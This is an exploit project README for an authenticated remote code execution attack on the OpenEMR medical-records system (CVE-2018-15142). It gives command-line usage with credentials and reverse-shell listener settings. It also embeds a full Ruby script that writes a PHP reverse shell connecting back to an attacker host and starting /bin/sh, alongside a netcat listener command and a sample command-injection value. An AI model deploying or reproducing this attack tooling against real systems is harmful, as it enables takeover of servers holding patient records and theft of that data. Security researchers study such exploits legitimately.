Project author: noraj

Project description:
OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution
Language: Ruby
Project URL: git://github.com/noraj/OpenEMR-RCE.git
Created: 2020-07-16T18:52:15Z
Project community: https://github.com/noraj/OpenEMR-RCE

License: MIT License

OpenEMR RCE exploit / PoC

OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Exploit for CVE-2018-15142.

[EDB-49486] [PacketStorm] [WLB-2020080011]

Usage

  $ ruby exploit.rb --help
  OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

  Usage:
    exploit.rb manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
    exploit.rb semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
    exploit.rb auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
    exploit.rb -H | --help

  Options:
    -r <url>, --root-url <url>          Root URL (base path) including HTTP scheme, port and root folder
    -s <filename>, --shell <filename>   Filename of the PHP reverse shell payload
    -u <username>, --user <username>    Username of the admin
    -p <password>, --password <password>  Password of the admin
    -m <payload>, --payload <payload>   Metasploit PHP payload
    -h <host>, --lhost <host>           Reverse shell local host
    -t <port>, --lport <port>           Reverse shell local port
    --debug                             Display arguments
    -H, --help                          Show this screen

  Examples:
    exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
    exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
    exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999

Modes

  • Auto: you know the target and already have your listener ready; the exploit generates the default php/reverse_php payload and handles the rest
  • Semi-auto: same as auto, but you specify a Metasploit PHP payload other than the default php/reverse_php
  • Manual: you already have a custom PHP reverse shell; the exploit lets you specify its filename
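The README does not say what a manual-mode `--shell` file has to contain. The Ruby below is an added example, not code from noraj's OpenEMR-RCE: it writes a minimal PHP connect-back shell (a plain fsockopen/proc_open shell, not the Metasploit php/reverse_php payload the auto and semi-auto modes generate) and validates LHOST and LPORT before embedding them in the PHP source, since the host is interpolated into a PHP string literal. The host 10.0.0.2, port 8888 and filename myRevShell.php mirror the usage examples above and are assumptions.

```ruby
# Added example, not part of noraj's OpenEMR-RCE: build the custom PHP reverse
# shell file that `exploit.rb manual --shell <filename>` uploads.
# It is a plain fsockopen/proc_open connect-back shell, not the Metasploit
# php/reverse_php payload the auto and semi-auto modes generate.
require 'ipaddr'
require 'tmpdir'

# Accept only a literal IP address or a DNS hostname. LHOST is interpolated
# into a double-quoted PHP string, so anything carrying quotes, parentheses
# or other PHP syntax is rejected instead of being embedded.
def valid_lhost?(host)
  return false if host.nil? || host.empty? || host.include?('/')
  IPAddr.new(host)
  true
rescue IPAddr::InvalidAddressError
  host.match?(/\A[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*\z/i)
end

# LPORT must be an integer TCP port, not a string taken straight from argv.
def valid_lport?(port)
  port.is_a?(Integer) && port.between?(1, 65_535)
end

# Return the PHP source: open a TCP socket back to LHOST:LPORT and start an
# interactive /bin/sh with stdin, stdout and stderr attached to that socket.
def php_reverse_shell(lhost, lport)
  raise ArgumentError, "invalid LHOST #{lhost.inspect}" unless valid_lhost?(lhost)
  raise ArgumentError, "invalid LPORT #{lport.inspect}" unless valid_lport?(lport)
  <<~PHP
    <?php
    $sock = fsockopen("#{lhost}", #{lport}, $errno, $errstr, 30);
    if (!$sock) { die("connect failed: $errstr ($errno)"); }
    $proc = proc_open("/bin/sh -i", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
    if (is_resource($proc)) { proc_close($proc); }
    fclose($sock);
  PHP
end

# Write the shell to disk and return the path to hand to --shell.
def write_shell(path, lhost, lport)
  File.write(path, php_reverse_shell(lhost, lport))
  path
end

if __FILE__ == $PROGRAM_NAME
  # Assumed values matching the usage examples; the listener on 10.0.0.2:8888
  # (for instance `nc -lvnp 8888`) must already be running before the upload.
  path = write_shell(File.join(Dir.tmpdir, 'myRevShell.php'), '10.0.0.2', 8888)
  puts "wrote #{path}"
  puts "next: ruby exploit.rb manual -r http://example.org/openemr -s #{path} -u admin -p pass123"
end
```

The hostname check matters more than it looks: `--lhost` and `--lport` come from the command line, and a value such as `10.0.0.2"); system("id` would otherwise end up inside the PHP string and change what the uploaded file does on the target.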

Requirements

Example for BlackArch:

  pacman -S ruby-httpclient ruby-docopt metasploit

Example using gem:

  gem install httpclient docopt

Reference

This is an improved rewrite of EDB-ID-48515 and an implementation of part 2 of EDB-ID-45202:

  • uses command-line arguments instead of hardcoded values
  • accepts a custom PHP reverse shell or generates one automatically with msfconsole
  • cleaner and more customizable
  • written in Ruby (Python 2 is deprecated)

This exploit was tested with Ruby 2.7.1.

About EDB-ID-48515:

  Exploit Author: Musyoka Ian
  Date: 2020-05-25
  Vendor Homepage: https://www.open-emr.org/
  Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
  Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
  Version: < 5.0.1 (Patch 4)
  Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
  References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69